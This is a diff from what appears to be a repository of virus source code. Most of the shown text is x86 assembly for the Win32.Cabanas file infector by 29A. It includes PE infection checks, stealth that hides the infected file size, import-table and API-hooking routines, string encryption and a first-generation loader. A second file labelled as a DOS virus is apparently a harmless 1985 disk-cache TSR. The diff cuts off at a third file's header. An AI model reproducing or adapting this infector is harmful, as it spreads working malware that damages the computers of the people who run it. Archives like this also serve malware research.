+Check_PE_sign: ;this function checks validity of a PE file.
+ ;on entry:
+ ; ECX = base address of memory-maped file
+ ; EBX = pointer to WIN32_FIND_DATA structure
+ ; EAX = host file size - 80h
+ ;on exit:
+ ; ESI = 0, file already infected or not infectable
+ ; ESI != 0, file not infected
+
+ cmp word ptr [ecx],IMAGE_DOS_SIGNATURE ;needs MZ signature
+ jnz Close_File
+ mov edi,[ecx.MZ_lfanew] ;get ptr to new exe format
+ cmp eax,edi ;ptr out of range?
+ jb Close_File
+ add edi,ecx
+ cmp dword ptr [edi],IMAGE_NT_SIGNATURE ;check PE signature
+ jnz Close_File
+ cmp word ptr [edi.NT_FileHeader.FH_Machine], \ ;must be 386+ machine
+ IMAGE_FILE_MACHINE_I386
+ jnz Close_File
+ mov eax,dword ptr [edi.NT_FileHeader.FH_Characteristics]
+ not al
+ test ax,IMAGE_FILE_EXECUTABLE_IMAGE or \ ;must have the executable bit but cant be a DLL
+ IMAGE_FILE_DLL
+ jnz Close_File
+
+ ;at this point, calculate virus checksum to make sure file is really
+ ;infected. If its infected then return original size of host previous
+ ;to infection and store it in the WIN32_FIND_DATA structure (stealth).
+
+ mov eax,[edi.NT_OptionalHeader.OH_CheckSum] ;get checksum field
+ push eax
+ sub al,2Dh ;calculate virus checksum to make sure file is really infected
+ xor ah,al
+ mov al,[edi.NT_FileHeader.FH_TimeDateStamp.hiw.hib]
+ xor ah,byte ptr [edi.NT_OptionalHeader.OH_CheckSum.hiw]
+ and al,11111100b
+ xor ah,al
+ mov [ebp + uni_or_ansi - ebp_num],ah
+ inc ah
+ pop eax
+ jnz go_esi
+ xor eax,0B2FD26A3h xor 68000000h
+ xor eax,[edi.NT_FileHeader.FH_TimeDateStamp]
+ and eax,03FFFFFFh
+ cmp eax,[ebx.WFD_nFileSizeLow]
+ jnc go_esi
+ mov [ebx.WFD_nFileSizeLow],eax ;return original file size
+go_esi: inc esi ;set "already infected" mark
+
+Close_File:
+
+ call Close&UnmapFile ;close and unmaps file
+
+end_PE_file:
+
+ dec esi
+ ret
+
+pop_ebp: ;get the ebp_num value needed to access variablez thru EBP
+ pop ebp
+ if (ebp_num - m_ebp)
+ lea ebp,[ebp + ebp_num - m_ebp]
+ endif
+ mov [ebp + uni_or_ansi - ebp_num],al
+ cld
+
+another_ret:
+
+ ret
+
+Process_File2: ;this function checks the file size, retrieves some key API
+ ; adressez from inside the import table and infects the file.
+ ;on entry:
+ ; EBX = pointer to WIN32_FIND_DATA structure
+ ; ESI = pointer to filename
+
+ call get_size
+ jnz another_ret ;if file size too short, jump
+ cmp eax,4000000h - 10*1024
+ jnc another_ret ;if file size too large (>64MB), jump
+ div ecx ;check infection thru size paddin
+ dec edx
+ js another_ret ;already infected, jump
+ call check_PE_file ;open file, check PE signature and close file
+ jnz another_ret ;not valid PE file, jump
+ inc byte ptr [ebp + uni_or_ansi - ebp_num] ;double-check file
+ jz another_ret ;discard if infected
+
+Bless: ;this function prepares the host file for infection: blank file
+ ; atributez, open and map file in r/w mode, retrieves RVA pointerz
+ ; to GetModuleHandleA, GetModuleHandleW and GetProcAddress, call
+ ; the "Attach" function to infect the file and finaly restore
+ ; date/time stamp and attributez
+
+ push esi
+ lea esi,[ebp + PathName - ebp_num] ;get pointer to filename
+ push esi
+ call [ebp + ddSetFileAttributesA - ebp_num] ;blank file atributez
+ xchg ecx,eax
+ jecxz another_ret ;if error, jump, if disk is write-protected for example
+ push esi
+ mov edi,virtual_end - code_start ;calculate buffer size needed for infection
+ add edi,[ebx.WFD_nFileSizeLow] ;add to original size
+ call Open&MapFileAdj ;open and map file in read/write mode
+ jecxz end_Bless2 ;if any error, if file is locked for example, jump
+
+ lea eax,[ebp + vszGetModuleHandleA - ebp_num]
+ call IGetProcAddressIT ;get RVA pointer to GetModuleHandleA API in the import table
+ test esi,esi
+ jz end_Bless3 ;if KERNEL32 import descriptor not found, dont infect
+
+ x = IMAGE_SIZEOF_IMPORT_DESCRIPTOR
+
+ mov [ebp + ptrForwarderChain - ebp_num],edx ;store RVA pointer to ForwarderChain field from KERNEL32 import descriptor
+ mov edx,[esi.ID_ForwarderChain - x]
+ mov [ebp + ddGetModuleHandleA - ebp_num],eax ;store RVA pointer to GetModuleHandleA API
+ mov [ebp + ddForwarderChain - ebp_num],edx ;store actual ForwarderChain field value from KERNEL32 import descriptor
+ cdq ;edx=0
+ dec eax ;if RVA pointer to GetModuleHandleA found, jump and store null for GetModulehandleW RVA pointer (not needed)
+ jns StoreHandleW
+ lea eax,[ebp + vszGetModuleHandleW - ebp_num]
+ call IGetProcAddressIT ;get RVA pointer to GetProcAddress API in the import table
+ xchg eax,edx
+ test edx,edx ;if found, jump and store GetModuleHandleW RVA pointer
+ jnz StoreHandleW
+
+ cmp [esi.ID_TimeDateStamp - x],edx ;shit, not found, now check if KERNEL32 API adressez are binded
+ jz StoreHandleW
+ cmp edx,[esi.ID_OriginalFirstThunk - x]
+ jz end_Bless3
+ mov [esi.ID_TimeDateStamp - x],edx
+
+StoreHandleW:
+
+ mov [ebp + ddGetModuleHandleW - ebp_num],edx ;store RVA pointer to GetModuleHandleW API
+ lea eax,[ebp + vszGetProcAddress - ebp_num]
+ call IGetProcAddressIT ;get RVA pointer to GetModuleHandleA API in the import table
+ mov [ebp + ddGetProcAddress - ebp_num],eax ;store RVA pointer to GetModuleHandleW API if found, store zero if not found anywayz
+
+ call Attach ;infect file
+ ;at this point:
+ ; ECX = host base adress, start of memory-maped file
+ ; EDI = original file size
+
+end_Bless3:
+
+ call Close&UnmapFileAdj ;close, unmap file and restore other setingz if necesary
+
+end_Bless2:
+
+ pop esi ;get pointer to filename
+ mov ecx,[ebx.WFD_dwFileAttributes] ;get original file atributez
+ jecxz end_Bless1
+ push ecx
+ push esi
+ call [ebp + ddSetFileAttributesA - ebp_num] ;restore original file atributez
+
+end_Bless1:
+
+end_Process_File2:
+
+ ret
+
+GetProcAddressET proc ;This function is similar to GetProcAddressIT except
+ ; that it looks for API functions in the export table
+ ; of a given DLL module. It has the same functionality
+ ; as the original GetProcAddress API exported from
+ ; KERNEL32 except that it is able to find API
+ ; functions exported by ordinal from KERNEL32.
+ ;on entry:
+ ; TOS+08h (Arg2): pszAPIname (pointer to API name)
+ ; TOS+04h (Arg1): module handle/base address of module
+ ; TOS+00h (return adress)
+ ;on exit:
+ ; ECX = API function address
+ ; ECX = 0, if not found
+
+ pushad
+ @SEH_SetupFrame
+ mov eax,[esp.(2*Pshd).cPushad.Arg1] ;get Module Handle from Arg1
+ mov ebx,eax
+ add eax,[eax.MZ_lfanew] ;get address of PE header
+ mov ecx,[eax.NT_OptionalHeader \ ;get size of Export directory
+ .OH_DirectoryEntries \
+ .DE_Export \
+ .DD_Size]
+ jecxz Proc_Address_not_found ;size is zero, no API exported
+ mov ebp,ebx ;get address of Export directory
+ add ebp,[eax.NT_OptionalHeader \
+ .OH_DirectoryEntries \
+ .DE_Export \
+ .DD_VirtualAddress]
+ifdef Ordinal
+ mov eax,[esp.(2*Pshd).cPushad.Arg2] ;get address of requested API from Arg2
+ test eax,-10000h ;check if Arg2 is an ordinal
+ jz Its_API_ordinal
+endif
+
+Its_API_name:
+
+ push ecx
+ mov edx,ebx ;get address of exported API namez
+ add edx,[ebp.ED_AddressOfNames]
+ mov ecx,[ebp.ED_NumberOfNames] ;get number of exported API namez
+ xor eax,eax
+ cld
+
+Search_for_API_name:
+
+ mov esi,ebx ;get address of next exported API name
+ add esi,[edx+eax*4]
+ mov edi,[esp.(3*Pshd).cPushad.Arg2] ;get address of requested API name from Arg2
+
+Next_Char_in_API_name:
+
+ cmpsb ;find requested API from all exported API namez
+ jz Matched_char_in_API_name
+ inc eax
+ loop Search_for_API_name
+ pop eax
+
+Proc_Address_not_found:
+
+ xor eax,eax ;API not found
+ jmp End_GetProcAddressET
+
+ifdef Ordinal
+
+Its_API_ordinal:
+
+ sub eax,[ebp.ED_BaseOrdinal] ;normalize Ordinal, i.e. convert it to an index
+ jmp Check_Index
+endif
+
+Matched_char_in_API_name:
+
+ cmp byte ptr [esi-1],0 ;end of API name reached ?
+ jnz Next_Char_in_API_name
+ pop ecx
+ mov edx,ebx ;get address of exported API ordinalz
+ add edx,[ebp.ED_AddressOfOrdinals]
+ movzx eax,word ptr [edx+eax*2] ;get index into exported API functionz
+
+Check_Index:
+
+ cmp eax,[ebp.ED_NumberOfFunctions] ;check for out of range index
+ jae Proc_Address_not_found
+ mov edx,ebx ;get address of exported API functionz
+ add edx,[ebp.ED_AddressOfFunctions]
+ add ebx,[edx+eax*4] ;get address of requested API function
+ mov eax,ebx
+ sub ebx,ebp ;take care of forwarded API functionz
+ cmp ebx,ecx
+ jb Proc_Address_not_found
+
+End_GetProcAddressET:
+
+ mov [esp.(2*Pshd).Pushad_ecx],eax ;set requested Proc Address, if found
+ @SEH_RemoveFrame
+ popad
+ jmp Ret2Pshd
+
+GetProcAddressET endp
+
+goto_GetProcAddressET:
+
+ jmp GetProcAddressET
+
+MyGetProcAddressK32: ;this function is simply a wraper to the GetProcAddress
+ ; API. It retrieves the address of an API function
+ ; exported from KERNEL32.
+ ;on entry:
+ ; EBX = KERNEL32 module handle
+ ; ESI = pszAPIname (pointer to API name)
+ ;on exit:
+ ; ECX = API function address
+ ; ECX = 0, if not found
+
+ pop eax
+ push esi
+ push ebx
+ push eax
+
+MyGetProcAddress proc ;this function retrieves API adressez from KERNEL32
+
+ mov ecx,? ;this dynamic variable will hold an RVA pointer to the GetProcAddress API in the IAT
+ddGetProcAddress = dword ptr $ - 4
+ jecxz goto_GetProcAddressET
+ push esi
+ push ebx
+ add ecx,[ebp + phost_hdr - ebp_num]
+ call [ecx] ;call the original GetProcAddress API
+ xchg ecx,eax
+ jecxz goto_GetProcAddressET ;if error, call my own GetProcAddress function
+
+Ret2Pshd:
+
+ ret (2*Pshd)
+
+MyGetProcAddress endp
+
+MyGetModuleHandleW: ;this function retrieves the base address/module handle
+ ; of KERNEL32 module previosly loaded to memory asumin
+ ; the GetModuleHandleW API was found in the import
+ ; table of the host
+
+ mov ecx,? ;this dynamic variable will hold an RVA pointer to the GetModuleHandleW API in the IAT
+ddGetModuleHandleW = dword ptr $ - 4
+ jmp MyGetModuleHandle
+
+MyGetModuleHandleA: ;this function retrieves the base address/module handle
+ ; of KERNEL32 module previosly loaded to memory asumin
+ ; the GetModuleHandleA API was found in the import
+ ; table of the host
+
+ mov ecx,? ;this dynamic variable will hold an RVA pointer to the GetModuleHandleA API in the IAT
+ddGetModuleHandleA = dword ptr $ - 4
+
+MyGetModuleHandle proc ;this function retrieves the base adress of KERNEL32
+ ;on entry:
+ ; ECX = RVA pointer to GetModuleHandle(A/W) in the IAT
+ ; TOS+04h (Arg1): pointer to KERNEL32 module name
+ ; TOS+00h (return adress)
+ ;on exit:
+ ; Zero flag set = Base adress not found
+ ; Zero flag clear = Base adress found
+ ; EAX = KERNEL32 base adress
+
+ sub eax,eax ;set zero flag
+ pop ebx ;get return adress
+ pop eax ;Arg1
+ push ebx ;push return adress
+ mov ebx,[ebp + phost_hdr - ebp_num] ;get actual host base adress
+ jecxz end_MyGetModuleHandle ;if not valid GetModuleHandle(A/W) RVA, jump
+ push eax
+ call [ebx + ecx] ;call GetModuleHandle(A/W) API
+ chk_0: inc eax
+ jz end_MyGetModuleHandle ;if any error, not found, jump
+ dec eax
+
+end_MyGetModuleHandle:
+
+ ret
+
+MyGetModuleHandleX: ;this function retrieves the KERNEL32 base adress
+ ; via an undocumented method. This function procedure
+ ; doesnt work in Winblowz NT
+
+ mov eax,[ebx + 12345678h]
+ptrForwarderChain = dword ptr $ - 4
+ cmp eax,12345678h
+ddForwarderChain = dword ptr $ - 4
+ jnz chk_0
+ ret
+
+MyGetModuleHandle endp
+
+get_ebp2: mov al,0
+ jnc get_ebp ;clear carry (unicode version)
+ dec eax ;clear set (ansi version)
+
+get_ebp: call pop_ebp
+
+m_ebp:
+
+v_end: ;virus code ends here
+
+;uninitialized data ;these variablez will be adressed in memory, but dont waste space in the file
+
+ImportHdr dd ? ;import table RVA of current host
+pCodeTable dd ? ;pointer to encrypted chunkz of code ;these 2 variables may overlap.
+ org $ - 4 ;one is used at instalation stage,
+pHandlez dd ? ;pointer to top of Handlez table ;the other one used when resident.
+phost_hdr dd ? ;pointer to actual base adress of host
+pcode_start dd ? ;pointer to start of virus code/data in memory
+K32Mod dd ? ;KERNEL32 base adress
+ddGetProcAddress2 dd ? ;adress where GetProcAddress API will be stored ;these 2 variables may overlap.
+ org $ - 4 ;one is used at instalation stage,
+pPathNamez dd ? ;pointer to top of PathNamez table ;the other one used when resident.
+pNewAPIs dd ? ;pointer to new API entry in the jump table
+uni_or_ansi db ? ;needed to diferentiate unicode from ansi stringz
+
+FunctionAdressez: ;this dwordz will hold the API function adressez used by the virus
+
+ddCreateFileA dd ?
+ddCreateFileW dd ?
+ddFindClose dd ?
+ddFindFirstFileA dd ?
+ddFindFirstFileW dd ?
+ddFindNextFileA dd ?
+ddFindNextFileW dd ?
+ddSetFileAttributesA dd ?
+ddSetFileAttributesW dd ?
+ddCloseHandle dd ?
+
+ddCreateFileMappingA dd ?
+ddMapViewOfFile dd ?
+ddUnmapViewOfFile dd ?
+ddSetFilePointer dd ?
+ddSetEndOfFile dd ?
+ddSetFileTime dd ?
+ddGetWindowsDirectoryA dd ?
+ddGetSystemDirectoryA dd ?
+ddGetCurrentProcess dd ?
+ddGetModuleFileName dd ?
+ddWriteProcessMemory dd ?
+ddWideCharToMultiByte dd ?
+ddVirtualAlloc dd ?
+
+v_stringz: ;the API namez used by the virus are decrypted here
+
+vszKernel32 db 'KERNEL32',0
+vszGetModuleHandleA db 'GetModuleHandleA',0
+vszGetModuleHandleW db 'GetModuleHandleW',0
+
+Exts db 'fxEtcR' ;list of extensionz to infect
+ db 0
+
+FunctionNamez2: ;resident API namez, needed for dynamically API hookin
+
+vszGetProcAddress db 'GetProcAddress',0
+vszGetFileAttributesA db 'GetFileAttributesA',0
+vszGetFileAttributesW db 'GetFileAttributesW',0
+vszMoveFileExA db 'MoveFileExA',0
+vszMoveFileExW db 'MoveFileExW',0
+vsz_lopen db '_lopen',0
+vszCopyFileA db 'CopyFileA',0
+vszCopyFileW db 'CopyFileW',0
+vszOpenFile db 'OpenFile',0
+vszMoveFileA db 'MoveFileA',0
+vszMoveFileW db 'MoveFileW',0
+vszCreateProcessA db 'CreateProcessA',0
+vszCreateProcessW db 'CreateProcessW',0
+
+FunctionNamez:
+
+vszCreateFileA db 'CreateFileA',0
+vszCreateFileW db 'CreateFileW',0
+vszFindClose db 'FindClose',0
+vszFindFirstFileA db 'FindFirstFileA',0
+vszFindFirstFileW db 'FindFirstFileW',0
+vszFindNextFileA db 'FindNextFileA',0
+vszFindNextFileW db 'FindNextFileW',0
+vszSetFileAttributesA db 'SetFileAttributesA',0
+vszSetFileAttributesW db 'SetFileAttributesW',0
+
+non_res: ;non-resident API namez
+
+vszCloseHandle db 'CloseHandle',0
+vszCreateFileMappingA db 'CreateFileMappingA',0
+vszMapViewOfFile db 'MapViewOfFile',0
+vszUnmapViewOfFile db 'UnmapViewOfFile',0
+vszSetFilePointer db 'SetFilePointer',0
+vszSetEndOfFile db 'SetEndOfFile',0
+vszSetFileTime db 'SetFileTime',0
+vszGetWindowsDirectory db 'GetWindowsDirectoryA',0
+vszGetSystemDirectory db 'GetSystemDirectoryA',0
+vszGetCurrentProcess db 'GetCurrentProcess',0
+vszGetModuleFileName db 'GetModuleFileNameA',0
+vszWriteProcessMemory db 'WriteProcessMemory',0
+vszWideCharToMultiByte db 'WideCharToMultiByte',0
+vszVirtualAlloc db 'VirtualAlloc',0
+
+EndOfFunctionNamez db 0
+
+szCopyright db "(c) Win32.Cabanas v1.1 by jqwerty/29A.",0
+
+ org (non_res + 1)
+v_end2:
+
+NewAPItable db nAPIS dup (?)
+
+FindData WIN32_FIND_DATA ? ;this structure will hold data retrieved trhu FindFirst/Next APIz
+
+PathName db MAX_PATH dup (?) ;filenamez will be stored here for infection
+
+virtual_end: ;end of virus virtual memory space (in PE filez)
+
+Handlez db nHANDLEZ dup (?) ;Handlez table
+
+PathNamez db nPATHNAMEZ dup (?) ;PathNamez table
+
+virtual_end2: ;end of virus virtual memory space (in flat memory)
+
+first_generation: ;this routine will be called only once from the first generation sample,
+ ;it initializes some variables needed by the virus in the first run.
+jumps
+ push NULL
+ call GetModuleHandleA
+ test eax,eax
+ jz exit
+ xchg ecx,eax
+ call ref
+ ref: pop ebx
+
+ mov eax,ebx
+ sub eax,ref - host
+ sub eax,ecx
+ sub eax,[add_1st_val]
+ mov [ebx + code_table - ref],eax
+
+ mov al,6Ah
+ ror al,1
+ xor al,[xor_2nd_val]
+ mov [ebx + code_table + 6 - ref],al
+
+ mov eax,ebx
+ sub eax,ref - code_table
+ sub eax,ecx
+ neg eax
+ mov [ebx + delta_host - ref],eax
+
+ mov [ebx + old_base - ref],ecx
+
+ mov eax,[ebx + pfnGMH - ref]
+ .if word ptr [eax] == 25FFh ;jmp [xxxxxxxx]
+ mov eax,[eax + 2]
+ .endif
+ sub eax,ecx
+ mov [ebx + ddGetModuleHandleA - ref],eax ;set GetModuleHandleA RVA pointer
+
+ mov eax,[ebx + pfnGPA - ref]
+ .if word ptr [eax] == 25FFh ;jmp [xxxxxxxx]
+ mov eax,[eax + 2]
+ .endif
+ sub eax,ecx
+ mov [ebx + ddGetProcAddress - ref],eax ;set GetProcAddress RVA pointer
+
+ cld ;encrypt API stringz
+ mov ecx,ve_string_size
+ lea esi,[ebx + ve_stringz - ref]
+ mov edi,esi
+
+encrypt_stringz:
+
+ lodsb
+ cmp al,80h
+ lahf
+ xor al,0B5h
+ ror al,cl
+ stosb
+ sahf
+ .if zero?
+ movsb
+ .endif
+ dec ecx
+ cmp ecx,10
+ jnz encrypt_stringz
+
+ mov ecx,v_end2 - v_stringz
+ lea edi,[ebx + v_stringz - ref]
+ mov al,-1
+ rep stosb
+
+ jmp v_start
+
+pfnGMH dd offset GetModuleHandleA
+pfnGPA dd offset GetProcAddress
+
+;Host code starts here
+
+extrn MessageBoxA: proc
+extrn ExitProcess: proc
+
+host: push MB_OK ;display message box
+ @pushsz "(c) Win32.Cabanas v1.1 by jqwerty/29A"
+ @pushsz "First generation sample"
+ push NULL
+ call MessageBoxA
+
+exit: push 0 ;exit host
+ call ExitProcess
+
+ end first_generation
diff --git a/MSDOS/Virus.MSDOS.Unknown.cache.asm b/MSDOS/Virus.MSDOS.Unknown.cache.asm
new file mode 100644
index 00000000..84bd8c61
--- /dev/null
+++ b/MSDOS/Virus.MSDOS.Unknown.cache.asm
@@ -0,0 +1,255 @@ +INTERRUPTS SEGMENT AT 0H ;This is where the disk interrupt + ORG 13H*4 ;holds the address of its service routine +DISK_INT LABEL DWORD +INTERRUPTS ENDS + +CODE_SEG SEGMENT + ASSUME CS:CODE_SEG + ORG 100H ;ORG = 100H to make this into a .COM file +FIRST: JMP LOAD_CACHE ;First time through jump to initialize routine + + CPY_RGT DB '(C)1985 S.Holzner' ;A signature in bytes + TBL_LEN DW 64 ;<-- # OF SECTORS TO STORE IN CACHE, MIN=24, MAX=124. + ;THIS IS THE ONLY PLACE YOU MUST SET THIS NUMBER. EACH SECTOR = 512 BYTES. + TIME DW 0 ;Time used to time-stamp each sector + OLD_CX DW 0 ;Stores original value of CX (CX is used often) + LOW_TIM DW 0 ;Used in searching for least recently used sect. + INT13H DD 0 ;Stores the original INT 13H address + RET_ADR LABEL DWORD ;Playing games with the stack here to preserve + RET_ADR_WORD DW 2 DUP(0) ;flags returned by Int 13H + +DISK_CACHE PROC FAR ;The Disk interrupt will now come here. + ASSUME CS:CODE_SEG + CMP AX,201H ;Is this a read (AH=2) of 1 sector (AL=1)? + JE READ ;Yes, jump to Read + CMP AH,3 ;No. Perchance a write or format? + JB OLD_INT ;No, release control to old disk Int. + JMP WRITE ;Yes, jump to Write +OLD_INT:PUSHF ;Pushf for Int 13H's final Iret + CALL INT13H ;Call the Disk Int + JMP PAST ;And jump past all usual Pops +READ: PUSH BX ;Push just about every register ever heard of + PUSH CX + PUSH DX + PUSH DI + PUSH SI + PUSH DS + PUSH ES + MOV DI,BX ;Int 13H gets data address as ES:BX, switch to ES:DI + ASSUME DS:CODE_SEG ;Make sure all labels found correctly + PUSH CS ;Move CS into DS by pushing CS, popping DS + POP DS + MOV OLD_CX,CX ;Save original CX since we're about to use it + CMP DH,0 ;DH holds requested head -- head 0? + JNE NOT_FAT1 ;Nope, this can't be the first Fat sector + CMP CX,6 ;If this is the directory, check if we have a + JE FAT1 ; new disk. + CMP CX,2 ;Track 0 (CH)? Sector 2 (CL)? 
+ JNE NOT_FAT1 ;If not, this sure isn't the FAT1 +FAT1: CALL FIND_MATCH ;DOS reads in this sector first to check disk format + JCXZ NONE ;We'll use it for a check-sum. Do we have it + MOV BX,DI ; stored yet? CX=0-->no. If yes, restore BX + MOV CX,OLD_CX ; and CX from original values + PUSHF ;And now do the Pushf and call of Int13H to read + CALL INT13H ; FAT1 + JC ERR ;If error, leave + MOV CX,256 ;No error, FAT1 was read, check our value +REPE CMPSW ; with CMPSW -- if no match, disk was changed + JCXZ BYE ;Everything checks out, Bingo, exit. + LEA SI,TABLE ;New Disk! Zero all the old disk's sectors + MOV CX,TBL_LEN ;Loop over all entries, DL holds drive # +CLR: CMP DS:[SI+2],DL ;Is this stored sector from the old disk? + JNE NO_CLR ;Nope, don't clear this entry + MOV WORD PTR DS:[SI],0 ;Match, zero this entry, zero first word +NO_CLR: ADD SI,518 ;Move on to next stored sector (512 bytes of stored + LOOP CLR ; sector and 3 words of identification & time-stamp) + JMP BYE ;Reset for new disk, let's leave +NONE: CALL STORE_SECTOR ;Store FAT1 if there was no match to it + JC ERR ;Error -- exit ungraciously + JMP BYE ;No Error, Bye. +NOT_FAT1: ;The requested sector was not FAT1. Let's + CALL FIND_MATCH ;get it. Or do we have it already? + JCXZ NO_MATCH ;No, jump to No_Match, store sector + MOV CX,512 ;ES:DI and DS:SI already set up from Find_Match +REP MOVSB ;Move 512 bytes to requested memory area + CMP WORD PTR [BX+4],0FFFFH ;Is this a a directory sector? + JE BYE ;Yes, don't reset time (already highest poss.) + INC TIME ;No, reset the time, this sector just accessed + MOV AX,TIME ;Move time into Time word of sector's 3 words + MOV [BX+4],AX ; of identification + JMP BYE ;And leave. If there's an article you'd like to +NO_MATCH: ;see, by all means write in C/O PC Magazine. + CALL STORE_SECTOR ;Don't have this sector yet, get it. + JC ERR ;If read failed, exit with error +BYE: CLC ;The exit point. 
Clear carry flag, set AX=1 + MOV AX,1 ; CY=0 --> no error, AH=0 --> error code = 0 +ERR: POP ES ;If error, preserve flags and AX with error code + POP DS ;Pop all conceivable registers (except AX) + POP SI + POP DI + POP DX + POP CX ;Now that the flags are set, we want to get the + POP BX ;old flags off the stack (put there by original +PAST: POP CS:RET_ADR_WORD ;Int call) To do that we save the return address + POP CS:RET_ADR_WORD[2] ;first and then pop the flags harmlessly + POP CS:OLD_CX ;into Old_CX, and then jump to RET_ADR. + JMP CS:RET_ADR ;Done with read. Now let's consider write. +WRITE: PUSH BX ;Push all registers, past and present + PUSH CX + PUSH DX + PUSH DI + PUSH SI + PUSH DS + PUSH ES + PUSH AX + CMP AX,301H ;Is this a write of one sector? + JNE NOSAVE ;No, don't save it in the sector bank + PUSH CS ;Yep, set DS (for call to Int13H label) and + POP DS ; write this sector out + PUSHF + CALL INT13H + JNC SAVE ;If there was an error we don't want to save sector + POP CS:OLD_CX ;Save AH error code, Pop old AX into Old_CX + JMP ERR ;And jump to an ignoble exit +SAVE: MOV OLD_CX,CX ;We're going to save this sector. + MOV DI,BX ;Set up DI for string move (to store written + CALL FIND_MATCH ; sector. Do we have it in memory? (set SI) + JCXZ LEAVE ;Nope, Leave (like above's Bye). + XCHG DI,SI ;Exchange destination and source + PUSH ES ;Set up DS:SI to point to where data written + POP DS ; from. We'll then use a string move + PUSH CS ;Set up ES so ES:DI points to sector bank + POP ES ; SI was set by Find_Match, Xchg'd into DI + MOV CX,512 ;Get ready to move 512 bytes +REP MOVSB ;Here we go +LEAVE: POP AX ;Here is the leave + JMP BYE ;Which only pops AX and then jumps to Bye +NOSAVE: PUSH CS ;More than 1 sector written, don't save but + POP DS ; do zero stored sectors that will be written + MOV AH,0 ;Use AX as loop index (AL=# of sectors to write) +TOP: PUSH CX ;Save CX since destroyed by Find_Match + CALL FIND_MATCH ;Do we have this one? 
+ JCXZ NOPE ;Nope if CX = 0 + MOV WORD PTR [BX],0 ;There is a match, zero this sector +NOPE: POP CX ;Restore CX, the sector index + INC CL ;Move on to next one + DEC AX ;Decrement loop index + JNZ TOP ;And, unless that gives 0, go back again +POPS: POP AX ;Pop 'em all, starting with AX + POP ES + POP DS + POP SI + POP DI + POP DX + POP CX + POP BX + JMP OLD_INT ;And go back to OLD_INT for write. +DISK_CACHE ENDP + +FIND_MATCH PROC NEAR ;This routine finds a sector in the sector bank + PUSH AX ;And returns SI set to sector's entry, BX set + LEA SI,SECTORS ; to the beginning of the 'table' -- the 3 words + LEA BX,TABLE ;that precede all sectors. If there was no match + MOV AX,TBL_LEN ; CX=0. When Int13H called, CH=trk #, CL=sec. # + XCHG AX,CX ; DH=head #, DL=Drive #. Get Tbl_Len into CX +FIND: CMP DS:[BX],AX ;Compare stored sector's original AX to current + JNE NO ;If not, not. + CMP DS:[BX+2],DX ;If so, check DX of stored sector with current + JE GOT_IT ;Yes, there is a match, leave +NO: ADD BX,518 ;Point to next Table entry + ADD SI,518 ;And next sector too + LOOP FIND ;Keep looping until there is a match +GOT_IT: POP AX ;If there is no match, CX will be left 0 + RET ;Return +FIND_MATCH ENDP + +STORE_SECTOR PROC NEAR ;This routine, as it says, stores sectors + MOV BX,DI ;Original BX (ES:BX was original data address) + MOV CX,OLD_CX ; and CX restored (CX=trk#, Sector#) + PUSHF ;Pushf for Int 13H's Iret and call it + CALL INT13H + JNC ALL_OK ;If there was an exit, exit ignominiously + JMP FIN ;If error, leave CY flag set, code in AH, exit +ALL_OK: PUSH CX ;No error, push used registers + PUSH BX ; and find space for sector in sector bank + PUSH DX + LEA DI,SECTORS ;Point to sector bank + LEA BX,TABLE ; and Table + MOV CX,TBL_LEN ; and get ready to loop over all of them to +CHK0: CMP WORD PTR DS:[BX],0 ;find if there is an unused sector + JE FOUND ;If the first word is 0, use this sector + ADD DI,518 ;But this one isn't so update DI, SI and + ADD BX,518 ; loop again 
+ LOOP CHK0 + MOV LOW_TIM,0FFFEH ;All sectors were filled, find least recently + LEA DI,SECTORS ; used and write over that one + LEA SI,TABLE + MOV CX,TBL_LEN ;Loop over all stored sectors +CHKTIM: MOV DX,LOW_TIM ;Compare stored sector to so-far low time + CMP [SI+4],DX + JA MORE_RECENT ;If this one is more recent, don't use it + MOV AX,DI ;This one is older than previous oldest + MOV BX,SI ;Store sector bank address (DI) and table + MOV DX,[SI+4] ; entry (now in SI) + MOV LOW_TIM,DX ;And update the Low Time to this one +MORE_RECENT: + ADD DI,518 ;Move on to next stored sector + ADD SI,518 ;And next table entry + LOOP CHKTIM ;Loop again until all covered + MOV DI,AX ;Get Sector bank address of oldest into DI +FOUND: POP DX ;Restore used registers + POP SI ;Old BX (data read-to-address) --> SI + POP CX + MOV [BX],CX ;Store the new CX as the sector's first word + MOV [BX+2],DX ;2nd word of Table is sector's DX + INC TIME ;Now find the new time + MOV AX,TIME ;Prepare to move it into 3rd word of Table + CMP DH,0 ;Is this directory or FAT? (time-->FFFF) + JNE SIDE1 ;If head is not 0, check other head + CMP CX,9 ;Head zero, trk# 0, first sector? (directory) + JLE DIR ;Yes, this is a piece we always want stored + JMP NOT_DIR ;No, definitely not FAT or directory +SIDE1: CMP DH,1 ;Head 1? + JNE NOT_DIR ;No, this is not File Alloc. Table or directory + CMP CX,2 ;Part of the top of the directory? + JA NOT_DIR ;No, go to Not_Dir and set time +DIR: MOV AX,0FFFFH ;Dir or FAT, set time high so always kept +NOT_DIR:MOV [BX+4],AX ;Not FAT or dir, store the incremented time + PUSH ES ;And now get the data to fill the sector + POP DS ;SI, DI already set. Now set ES and DS for + PUSH CS ; string move. 
+ POP ES + MOV CX,512 ;Move 512 bytes +REP MOVSB ;Right here + CLC ;Clear the carry flag (no error) +FIN: RET ;Error exit here (do not reset CY flag) +STORE_SECTOR ENDP +TABLE: DW 3 DUP(0) ;Table and sector storage begins right here +SECTORS: ;First thing to write over is the following + ; booster program. +LOAD_CACHE PROC NEAR ;This procedure intializes everything + LEA BX,CLEAR + ASSUME DS:INTERRUPTS ;The data segment will be the Interrupt area + MOV AX,INTERRUPTS + MOV DS,AX + MOV AX,word ptr DISK_INT ;Get the old interrupt service routine + MOV word ptr INT13H,AX ; address and put it into our location MOV AX,word ptr DISK_INT[2] + ; INT13H so we can call it. + MOV word ptr INT13H[2],AX + MOV word ptr DISK_INT,OFFSET DISK_CACHE ;Now load address of Cache + MOV word ptr DISK_INT[2],CS ;routine into the Disk interrupt + MOV AX,TBL_LEN ;The number of sectors to store in cache + MOV CX,518 ;Multiply by 518 (3 words of id and 512 + MUL CX ; bytes of sector data) + MOV CX,AX ;Also, zero all the bytes so that +ZERO: MOV BYTE PTR CS:[BX],0 ; Store_Sector will find 1st word a 0, + INC BX ; indicating virgin territory. + LOOP ZERO + MOV DX,OFFSET TABLE ;To attach in memory, add # bytes to + ADD DX,AX ;store to Table's location and use + INT 27H ; Int 27H +LOAD_CACHE ENDP +CLEAR: + CODE_SEG ENDS + END FIRST ;END "FIRST" so 8088 will go to FIRST first. + \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.cacodmon.asm b/MSDOS/Virus.MSDOS.Unknown.cacodmon.asm new file mode 